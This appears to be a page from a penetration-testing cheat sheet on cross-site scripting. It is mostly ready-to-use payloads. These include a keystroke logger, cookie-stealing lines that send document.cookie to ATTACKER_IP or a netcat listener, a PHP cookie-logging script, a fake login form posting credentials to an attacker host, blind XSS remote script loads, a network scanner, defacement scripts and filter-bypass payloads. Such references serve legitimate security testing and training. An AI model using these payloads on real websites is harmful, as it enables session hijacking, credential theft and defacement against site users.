Testing for XSS

XSS Types

Type

Description

Stored (Persistent)

Input stored in DB, displayed to all users (most critical)

Reflected (Non-Persistent)

Input reflected in response (e.g., search, error messages)

DOM-based

Processed client-side via JavaScript, never reaches server

Test Payloads

Basic Test

<script>alert(window.origin)</script>

Alternatives (if alert blocked)

<plaintext>
<script>print()</script>
<img src=x onerror=alert(1)>

DOM XSS (when script tags blocked)

<img src="" onerror=alert(window.origin)>

XSS Discovery Tools

# XSS Strike
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -u "http://TARGET/page.php?param=test"

# Other tools
# - Brute XSS: https://github.com/rajeshmajumdar/BruteXSS
# - XSSer: https://github.com/epsylon/xsser

Reflected XSS Exploitation

Find reflected parameter (check Network tab for GET/POST)
Inject payload in URL parameter
Send malicious URL to victim:

http://TARGET/search.php?q=<script>alert(1)</script>

DOM XSS - Source & Sink

Common Sources (user input)

document.URL
document.location
document.referrer
window.location
location.search
location.hash

Dangerous Sinks (vulnerable functions)

// JavaScript
document.write()
document.innerHTML
document.outerHTML

// jQuery
html()
append()
after()
add()

Stored XSS

Key Logger

<script type="text/javascript">
 let l = ""; // Variable to store key-strokes in
 document.onkeypress = function (e) { // Event to listen for key presses
   l += e.key; // If user types, log it to the l variable
   console.log(l); // update this line to post to your own server
 }
</script>

Chat Room XSS

Start a netcat listener on your attack box

nc -nlvp 4444

Take this XSS payload and paste it in the chat room and submit:

<script>window.location='http://10.13.**.**:4444/?cookie='+document.cookie</script>

Note: Send the payload and then open the listener

Stored XSS Payloads

Stored XSS pop up to display your cookies, good for a POC

<script>alert(document.cookie)</script>

Adding HTML to a website

<title>Example document: XSS Doc</title>

Deface website title. You will need inspect element and find the name of the element you want to change. thm-title is the element name in this example.

<script>document.getElementById('thm-title').innerHTML="I am a hacker"</script>

DOM-Based XSS

Internal Network Scanner

<script>
for (let i = 0; i < 256; i++) {
  let ip = '192.168.0.' + i
  let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
  document.body.innerHTML += code
}
</script>

Website Defacing

Change Background

<script>document.body.style.background = "#141d2b"</script>
<script>document.body.background = "http://ATTACKER/image.jpg"</script>

Change Title

<script>document.title = 'Hacked'</script>

Replace Page Content

<script>document.getElementsByTagName('body')[0].innerHTML = '<h1>Hacked</h1>'</script>

Remove Element

document.getElementById('elementId').remove();

XSS Phishing

document.write('<h3>Please login to continue</h3><form action=http://ATTACKER_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('originalForm').remove();

Comment Out Remaining HTML

...PAYLOAD... <!--

// Redirect method
document.location='http://ATTACKER_IP/steal.php?c='+document.cookie;

// Image method (stealthier)
new Image().src='http://ATTACKER_IP/steal.php?c='+document.cookie;

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Start Listener

# Simple netcat
sudo nc -lvnp 80

# PHP server (better - handles HTTP properly)
mkdir /tmp/tmpserver && cd /tmp/tmpserver
# create steal.php with above code
sudo php -S 0.0.0.0:80

Blind XSS Detection

Remote Script Loading (per field)

<script src=http://ATTACKER_IP/fullname></script>
<script src=http://ATTACKER_IP/username></script>
<script src=http://ATTACKER_IP/email></script>

Blind XSS Payloads

<script src=http://ATTACKER_IP></script>
'><script src=http://ATTACKER_IP></script>
"><script src=http://ATTACKER_IP></script>
<script>$.getScript("http://ATTACKER_IP")</script>

new Image().src='http://ATTACKER_IP/steal.php?c='+document.cookie

Common Injection Contexts

Context

Payload

Inside <script>

';alert(1)// or ";alert(1)//

HTML attribute

" onmouseover=alert(1)

HTML tag

<img src=x onerror=alert(1)>

URL parameter

javascript:alert(1)

Event handler

'-alert(1)-'

Bypass Techniques

Case Variation

<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x onerror=alert(1)>

Encoding

<script>eval(atob('YWxlcnQoMSk='))</script>

No Parentheses

<script>alert`1`</script>
<img src=x onerror=alert`1`>

No Quotes

<script>alert(String.fromCharCode(88,83,83))</script>

Filter Bypass Payloads

<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>

PreviousTesting for SQL NextXXE Injection

Last updated 4 days ago

hashtagXSS Types

hashtagTest Payloads

hashtagBasic Test

hashtagAlternatives (if alert blocked)

hashtagDOM XSS (when script tags blocked)

hashtagXSS Discovery Tools

hashtagReflected XSS Exploitation

hashtagDOM XSS - Source & Sink

hashtagCommon Sources (user input)

hashtagDangerous Sinks (vulnerable functions)

hashtagStored XSS

hashtagKey Logger

hashtagChat Room XSS

hashtagStored XSS Payloads

hashtagDOM-Based XSS

hashtagInternal Network Scanner

hashtagWebsite Defacing

hashtagChange Background

hashtagChange Title

hashtagReplace Page Content

hashtagRemove Element

hashtagXSS Phishing

hashtagInject Login Form

hashtagComment Out Remaining HTML

hashtagSession Hijacking / Cookie Stealing

hashtagCookie Stealing Payloads

hashtagPHP Cookie Logger (steal.php)

hashtagStart Listener

hashtagBlind XSS Detection

hashtagRemote Script Loading (per field)

hashtagBlind XSS Payloads

hashtagscript.js for Cookie Stealing

hashtagCommon Injection Contexts

hashtagBypass Techniques

hashtagCase Variation

hashtagEncoding

hashtagNo Parentheses

hashtagNo Quotes

hashtagFilter Bypass Payloads